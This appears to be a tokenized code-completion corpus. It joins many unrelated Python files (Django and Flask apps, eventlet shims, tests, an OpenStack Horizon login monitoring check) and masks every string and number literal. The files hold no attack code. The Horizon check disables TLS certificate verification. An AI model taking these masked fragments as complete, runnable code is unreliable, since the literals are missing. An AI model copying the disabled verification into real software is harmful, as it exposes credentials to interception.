node_id , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in kwargs : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> valid = string . letters + string . digits + "<STR_LIT>" <EOL> test_valid = all ( [ c in valid for c in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not test_valid : <EOL> return self . _fail ( msg = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> r = api . nodes_query ( '<STR_LIT>' % ( <EOL> kwargs [ '<STR_LIT>' ] , ) ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> cluster_facts = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> environment_hash = { } <EOL> for k , v in kwargs . items ( ) : <EOL> if k in cluster_facts : <EOL> environment_hash [ k ] = v <EOL> environment_hash [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> environment_hash [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> environment_hash [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> environment_hash [ '<STR_LIT>' ] = <NUM_LIT:16> <EOL> environment_hash [ '<STR_LIT>' ] = "<STR_LIT:false>" <EOL> environment_hash [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cluster = self . _make_subcontainer ( <EOL> api , kwargs [ '<STR_LIT>' ] , node_id , environment_hash , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> attrs = { "<STR_LIT>" : True } ) <EOL> if cluster is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> infra = self . _make_subcontainer ( <EOL> api , '<STR_LIT>' , cluster [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if infra is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> comp = self . _make_subcontainer ( <EOL> api , '<STR_LIT>' , cluster [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT>" : True } ) <EOL> if comp is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> az = kwargs [ '<STR_LIT>' ] <EOL> self . _make_subcontainer ( <EOL> api , '<STR_LIT>' % az , comp [ '<STR_LIT:id>' ] , { '<STR_LIT>' : az } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self . _ok ( ) </s>
<s> import unittest2 <EOL> import sys <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> loader = unittest2 . TestLoader ( ) <EOL> tests = loader . discover ( '<STR_LIT>' ) <EOL> testRunner = unittest2 . runner . TextTestRunner ( stream = sys . stdout , <EOL> verbosity = <NUM_LIT:2> ) <EOL> runner = testRunner . run ( tests ) <EOL> sys . exit ( not runner . wasSuccessful ( ) ) </s>
<s> import argparse <EOL> import re <EOL> import ipaddr <EOL> from lxml import html <EOL> from maas_common import get_auth_details <EOL> from maas_common import metric <EOL> from maas_common import metric_bool <EOL> from maas_common import print_output <EOL> from maas_common import status_err <EOL> from maas_common import status_ok <EOL> import requests <EOL> from requests import exceptions as exc <EOL> def check ( args ) : <EOL> if requests . __build__ >= <NUM_LIT> : <EOL> requests . packages . urllib3 . disable_warnings ( ) <EOL> splash_status_code = <NUM_LIT:0> <EOL> splash_milliseconds = <NUM_LIT:0.0> <EOL> login_status_code = <NUM_LIT:0> <EOL> login_milliseconds = <NUM_LIT:0.0> <EOL> is_up = True <EOL> auth_details = get_auth_details ( ) <EOL> OS_USERNAME = auth_details [ '<STR_LIT>' ] <EOL> OS_PASSWORD = auth_details [ '<STR_LIT>' ] <EOL> HORIZON_URL = '<STR_LIT>' . format ( ip = args . ip ) <EOL> HORIZON_PORT = '<STR_LIT>' <EOL> s = requests . Session ( ) <EOL> try : <EOL> r = s . get ( '<STR_LIT>' % ( HORIZON_URL , HORIZON_PORT ) , <EOL> verify = False , <EOL> timeout = <NUM_LIT:10> ) <EOL> except ( exc . ConnectionError , <EOL> exc . HTTPError , <EOL> exc . Timeout ) as e : <EOL> is_up = False <EOL> else : <EOL> if not ( r . ok and <EOL> re . search ( '<STR_LIT>' , r . content , re . IGNORECASE ) ) : <EOL> status_err ( '<STR_LIT>' ) <EOL> splash_status_code = r . status_code <EOL> splash_milliseconds = r . elapsed . total_seconds ( ) * <NUM_LIT:1000> <EOL> csrf_token = html . fromstring ( r . content ) . xpath ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> region = html . fromstring ( r . content ) . xpath ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s . headers . update ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : HORIZON_URL } ) <EOL> payload = { '<STR_LIT:username>' : OS_USERNAME , <EOL> '<STR_LIT:password>' : OS_PASSWORD , <EOL> '<STR_LIT>' : csrf_token , <EOL> '<STR_LIT>' : region } <EOL> try : <EOL> l = s . post ( <EOL> ( '<STR_LIT>' ) % ( HORIZON_URL , HORIZON_PORT ) , <EOL> data = payload , <EOL> verify = False ) <EOL> except ( exc . ConnectionError , <EOL> exc . HTTPError , <EOL> exc . Timeout ) as e : <EOL> status_err ( '<STR_LIT>' % e ) <EOL> if not ( l . ok and re . search ( '<STR_LIT>' , l . content , re . IGNORECASE ) ) : <EOL> status_err ( '<STR_LIT>' ) <EOL> login_status_code = l . status_code <EOL> login_milliseconds = l . elapsed . total_seconds ( ) * <NUM_LIT:1000> <EOL> status_ok ( ) <EOL> metric_bool ( '<STR_LIT>' , is_up ) <EOL> if is_up : <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , splash_status_code , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , splash_milliseconds , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , login_status_code , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , login_milliseconds , '<STR_LIT>' ) <EOL> def main ( args ) : <EOL> check ( args ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> with print_output ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> type = ipaddr . IPv4Address , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> main ( args ) </s>
<s> import argparse <EOL> import errno <EOL> import yaml <EOL> def parse_args ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> return parser . parse_args ( ) <EOL> def get_config ( path ) : <EOL> try : <EOL> with open ( path ) as f : <EOL> data = f . read ( ) <EOL> except IOError as e : <EOL> if e . errno == errno . ENOENT : <EOL> data = None <EOL> else : <EOL> raise e <EOL> if data is None : <EOL> return { } <EOL> else : <EOL> return yaml . safe_load ( data ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> args = parse_args ( ) <EOL> base = get_config ( args . base ) <EOL> overrides = get_config ( args . overrides ) <EOL> config = dict ( base . items ( ) + overrides . items ( ) ) <EOL> if config : <EOL> with open ( args . base , '<STR_LIT:w>' ) as f : <EOL> f . write ( str ( yaml . safe_dump ( config , default_flow_style = False ) ) ) </s>
<s> from fetch_core import setup_environment , cprint <EOL> setup_environment ( ) <EOL> from dashboard . models import Project <EOL> projects = list ( Project . objects . exclude ( active = False ) . exclude ( pending = True ) ) <EOL> for project in projects : <EOL> cprint ( "<STR_LIT>" . format ( project . title ) , "<STR_LIT>" , attrs = [ "<STR_LIT>" ] ) <EOL> project . do_warnings ( ) <EOL> cprint ( "<STR_LIT>" . format ( project . title ) , "<STR_LIT>" , attrs = [ "<STR_LIT>" ] ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:email>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:200> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from dashboard . feeds import * <EOL> from dashboard . views import * <EOL> from django . conf . urls import * <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , feed . event ) , <EOL> ( r'<STR_LIT>' , feed . feed ) , <EOL> ( r'<STR_LIT>' , EventsFeed ( ) ) , <EOL> ) </s>
<s> import errno <EOL> import sys <EOL> import socket <EOL> import string <EOL> import linecache <EOL> import inspect <EOL> import warnings <EOL> from eventlet . support import greenlets as greenlet , BaseException <EOL> from eventlet import hubs <EOL> from eventlet import greenthread <EOL> from eventlet import debug <EOL> from eventlet import Timeout <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> def get_hub ( * a , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> return hubs . get_hub ( * a , ** kw ) <EOL> def get_default_hub ( * a , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> return hubs . get_default_hub ( * a , ** kw ) <EOL> def use_hub ( * a , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> return hubs . use_hub ( * a , ** kw ) <EOL> def switch ( coro , result = None , exc = None ) : <EOL> if exc is not None : <EOL> return coro . throw ( exc ) <EOL> return coro . switch ( result ) <EOL> Greenlet = greenlet . greenlet <EOL> def tcp_listener ( address , backlog = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( """<STR_LIT>""" , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from eventlet import greenio , util <EOL> socket = greenio . GreenSocket ( util . tcp_socket ( ) ) <EOL> util . socket_bind_and_listen ( socket , address , backlog = backlog ) <EOL> return socket <EOL> def ssl_listener ( address , certificate , private_key ) : <EOL> """<STR_LIT>""" <EOL> from eventlet import util <EOL> import socket <EOL> socket = util . wrap_ssl ( socket . socket ( ) , certificate , private_key , True ) <EOL> socket . bind ( address ) <EOL> socket . listen ( <NUM_LIT:50> ) <EOL> return socket <EOL> def connect_tcp ( address , localaddr = None ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( """<STR_LIT>""" , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> from eventlet import greenio , util <EOL> desc = greenio . GreenSocket ( util . tcp_socket ( ) ) <EOL> if localaddr is not None : <EOL> desc . bind ( localaddr ) <EOL> desc . connect ( address ) <EOL> return desc <EOL> TimeoutError = greenthread . TimeoutError <EOL> trampoline = hubs . trampoline <EOL> spawn = greenthread . spawn <EOL> spawn_n = greenthread . spawn_n <EOL> kill = greenthread . kill <EOL> call_after = greenthread . call_after <EOL> call_after_local = greenthread . call_after_local <EOL> call_after_global = greenthread . call_after_global <EOL> class _SilentException ( BaseException ) : <EOL> pass <EOL> class FakeTimer ( object ) : <EOL> def cancel ( self ) : <EOL> pass <EOL> class timeout ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , seconds , * throw_args ) : <EOL> self . seconds = seconds <EOL> if seconds is None : <EOL> return <EOL> if not throw_args : <EOL> self . throw_args = ( TimeoutError ( ) , ) <EOL> elif throw_args == ( None , ) : <EOL> self . throw_args = ( _SilentException ( ) , ) <EOL> else : <EOL> self . throw_args = throw_args <EOL> def __enter__ ( self ) : <EOL> if self . seconds is None : <EOL> self . timer = FakeTimer ( ) <EOL> else : <EOL> self . timer = exc_after ( self . seconds , * self . throw_args ) <EOL> return self . timer <EOL> def __exit__ ( self , typ , value , tb ) : <EOL> self . timer . cancel ( ) <EOL> if typ is _SilentException and value in self . throw_args : <EOL> return True <EOL> with_timeout = greenthread . with_timeout <EOL> exc_after = greenthread . exc_after <EOL> sleep = greenthread . sleep <EOL> getcurrent = greenlet . getcurrent <EOL> GreenletExit = greenlet . GreenletExit <EOL> spew = debug . spew <EOL> unspew = debug . unspew <EOL> def named ( name ) : <EOL> """<STR_LIT>""" <EOL> toimport = name <EOL> obj = None <EOL> import_err_strings = [ ] <EOL> while toimport : <EOL> try : <EOL> obj = __import__ ( toimport ) <EOL> break <EOL> except ImportError , err : <EOL> import_err_strings . append ( err . __str__ ( ) ) <EOL> toimport = '<STR_LIT:.>' . join ( toimport . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> if obj is None : <EOL> raise ImportError ( '<STR_LIT>' % ( name , import_err_strings ) ) <EOL> for seg in name . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] : <EOL> try : <EOL> obj = getattr ( obj , seg ) <EOL> except AttributeError : <EOL> dirobj = dir ( obj ) <EOL> dirobj . sort ( ) <EOL> raise AttributeError ( '<STR_LIT>' % ( <EOL> seg , obj , dirobj , name , import_err_strings ) ) <EOL> return obj </s>
<s> import errno <EOL> import new <EOL> import eventlet <EOL> from eventlet import greenio <EOL> from eventlet import patcher <EOL> from eventlet . green import os <EOL> from eventlet . green import select <EOL> patcher . inject ( '<STR_LIT>' , globals ( ) , ( '<STR_LIT>' , select ) ) <EOL> subprocess_orig = __import__ ( "<STR_LIT>" ) <EOL> class Popen ( subprocess_orig . Popen ) : <EOL> """<STR_LIT>""" <EOL> if not subprocess_orig . mswindows : <EOL> def __init__ ( self , args , bufsize = <NUM_LIT:0> , * argss , ** kwds ) : <EOL> subprocess_orig . Popen . __init__ ( self , args , <NUM_LIT:0> , * argss , ** kwds ) <EOL> for attr in "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" : <EOL> pipe = getattr ( self , attr ) <EOL> if pipe is not None : <EOL> wrapped_pipe = greenio . GreenPipe ( pipe , pipe . mode , bufsize ) <EOL> setattr ( self , attr , wrapped_pipe ) <EOL> __init__ . __doc__ = subprocess_orig . Popen . __init__ . __doc__ <EOL> def wait ( self , check_interval = <NUM_LIT> ) : <EOL> try : <EOL> while True : <EOL> status = self . poll ( ) <EOL> if status is not None : <EOL> return status <EOL> eventlet . sleep ( check_interval ) <EOL> except OSError , e : <EOL> if e . errno == errno . ECHILD : <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> raise <EOL> wait . __doc__ = subprocess_orig . Popen . wait . __doc__ <EOL> if not subprocess_orig . mswindows : <EOL> try : <EOL> _communicate = new . function ( subprocess_orig . Popen . _communicate . im_func . func_code , <EOL> globals ( ) ) <EOL> except AttributeError : <EOL> communicate = new . function ( subprocess_orig . Popen . communicate . im_func . func_code , <EOL> globals ( ) ) <EOL> call = new . function ( subprocess_orig . call . func_code , globals ( ) ) <EOL> try : <EOL> check_call = new . function ( subprocess_orig . check_call . func_code , globals ( ) ) <EOL> except AttributeError : <EOL> pass </s>
<s> from py . magic import greenlet <EOL> import sys <EOL> import types <EOL> def emulate ( ) : <EOL> module = types . ModuleType ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = module <EOL> module . greenlet = greenlet <EOL> module . getcurrent = greenlet . getcurrent <EOL> module . GreenletExit = greenlet . GreenletExit </s>
<s> from setuptools import find_packages , setup <EOL> from eventlet import __version__ <EOL> from os import path <EOL> import sys <EOL> requirements = [ ] <EOL> for flag , req in [ ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> if flag in sys . argv : <EOL> sys . argv . remove ( flag ) <EOL> else : <EOL> requirements . append ( req ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = requirements , <EOL> zip_safe = False , <EOL> long_description = open ( <EOL> path . join ( <EOL> path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) . read ( ) , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> ) </s>
<s> from eventlet import patcher <EOL> from eventlet . green import SimpleHTTPServer <EOL> patcher . inject ( '<STR_LIT>' , <EOL> globals ( ) , <EOL> ( '<STR_LIT>' , SimpleHTTPServer ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> import unittest <EOL> import socket as _original_sock <EOL> from eventlet import api <EOL> from eventlet . green import socket <EOL> class TestSocketErrors ( unittest . TestCase ) : <EOL> def test_connection_refused ( self ) : <EOL> server = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> server . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> server . listen ( <NUM_LIT:1> ) <EOL> port = server . getsockname ( ) [ <NUM_LIT:1> ] <EOL> server . close ( ) <EOL> del server <EOL> s = socket . socket ( ) <EOL> try : <EOL> s . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except socket . error , ex : <EOL> code , text = ex . args <EOL> assert code in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , ( code , text ) <EOL> assert '<STR_LIT>' in text . lower ( ) , ( code , text ) <EOL> def test_timeout_real_socket ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . test_timeout ( socket = _original_sock ) <EOL> def test_timeout ( self , socket = socket ) : <EOL> """<STR_LIT>""" <EOL> server = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> server . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> server . listen ( <NUM_LIT:1> ) <EOL> port = server . getsockname ( ) [ <NUM_LIT:1> ] <EOL> s = socket . socket ( ) <EOL> s . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> cs , addr = server . accept ( ) <EOL> cs . settimeout ( <NUM_LIT:1> ) <EOL> try : <EOL> try : <EOL> cs . recv ( <NUM_LIT> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except socket . timeout , ex : <EOL> assert hasattr ( ex , '<STR_LIT:args>' ) <EOL> assert len ( ex . args ) == <NUM_LIT:1> <EOL> assert ex . args [ <NUM_LIT:0> ] == '<STR_LIT>' <EOL> finally : <EOL> s . close ( ) <EOL> cs . close ( ) <EOL> server . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from input_algorithms . errors import BadSpec , BadSpecValue <EOL> from delfick_error import DelfickError , ProgrammerError <EOL> class HarpoonError ( DelfickError ) : pass <EOL> BadSpec = BadSpec <EOL> BadSpecValue = BadSpecValue <EOL> ProgrammerError = ProgrammerError <EOL> class BadConfiguration ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadOptionFormat ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadTask ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadOption ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class NoSuchKey ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class NoSuchImage ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadCommand ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadImage ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class CouldntKill ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class FailedImage ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadYaml ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadResult ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class UserQuit ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadDockerConnection ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class ImageDepCycle ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadDirectory ( BadSpecValue ) : <EOL> desc = "<STR_LIT>" <EOL> class BadFilename ( BadSpecValue ) : <EOL> desc = "<STR_LIT>" <EOL> class DeprecatedFeature ( BadSpecValue ) : <EOL> desc = "<STR_LIT>" <EOL> class BadEnvironment ( HarpoonError ) : <EOL> desc = "<STR_LIT>" <EOL> class BadAmazon ( HarpoonError ) : <EOL> desc = "<STR_LIT>" </s>
<s> from django . conf . urls import patterns , url <EOL> from polls import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . ResultsView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . vote , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> MIDDLEWARE_CLASSES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> AUTH_PASSWORD_VALIDATORS = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> ] <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' <EOL> TEST_RUNNER = '<STR_LIT>' <EOL> NUM_SLOW_TESTS = <NUM_LIT:5> </s>
<s> import os <EOL> import unittest <EOL> import coverage <EOL> from flask . ext . script import Manager <EOL> from flask . ext . migrate import Migrate , MigrateCommand <EOL> COV = coverage . coverage ( <EOL> branch = True , <EOL> include = '<STR_LIT>' , <EOL> omit = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> COV . start ( ) <EOL> from project . server import app , db <EOL> from project . server . models import User <EOL> migrate = Migrate ( app , db ) <EOL> manager = Manager ( app ) <EOL> manager . add_command ( '<STR_LIT>' , MigrateCommand ) <EOL> @ manager . command <EOL> def test ( ) : <EOL> """<STR_LIT>""" <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' , pattern = '<STR_LIT>' ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if result . wasSuccessful ( ) : <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> @ manager . command <EOL> def cov ( ) : <EOL> """<STR_LIT>""" <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if result . wasSuccessful ( ) : <EOL> COV . stop ( ) <EOL> COV . save ( ) <EOL> print ( '<STR_LIT>' ) <EOL> COV . report ( ) <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> covdir = os . path . join ( basedir , '<STR_LIT>' ) <EOL> COV . html_report ( directory = covdir ) <EOL> print ( '<STR_LIT>' % covdir ) <EOL> COV . erase ( ) <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> @ manager . command <EOL> def create_db ( ) : <EOL> """<STR_LIT>""" <EOL> db . create_all ( ) <EOL> @ manager . command <EOL> def drop_db ( ) : <EOL> """<STR_LIT>""" <EOL> db . drop_all ( ) <EOL> @ manager . command <EOL> def create_admin ( ) : <EOL> """<STR_LIT>""" <EOL> db . session . add ( User ( email = '<STR_LIT>' , password = '<STR_LIT>' , admin = True ) ) <EOL> db . session . commit ( ) <EOL> @ manager . command <EOL> def create_data ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import sys <EOL> from . PatchImporter import PatchImporter <EOL> import wrapt <EOL> from . log import * <EOL> from recipyCommon . utils import * <EOL> from recipyCommon . config import option_set <EOL> class PatchSimple ( PatchImporter ) : <EOL> """<STR_LIT>""" <EOL> def patch ( self , mod ) : <EOL> """<STR_LIT>""" <EOL> if not self . _ignore_input ( ) : <EOL> for f in self . input_functions : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % f ) <EOL> patch_function ( mod , f , self . input_wrapper ) <EOL> else : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % self . modulename ) <EOL> if not self . _ignore_output ( ) : <EOL> for f in self . output_functions : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % f ) <EOL> patch_function ( mod , f , self . output_wrapper ) <EOL> else : <EOL> if option_set ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' % self . modulename ) <EOL> return mod <EOL> def _ignore_input ( self ) : <EOL> root_modulename = self . modulename . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> return option_set ( '<STR_LIT>' , root_modulename ) or option_set ( '<STR_LIT>' , '<STR_LIT:all>' ) <EOL> def _ignore_output ( self ) : <EOL> root_modulename = self . modulename . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] 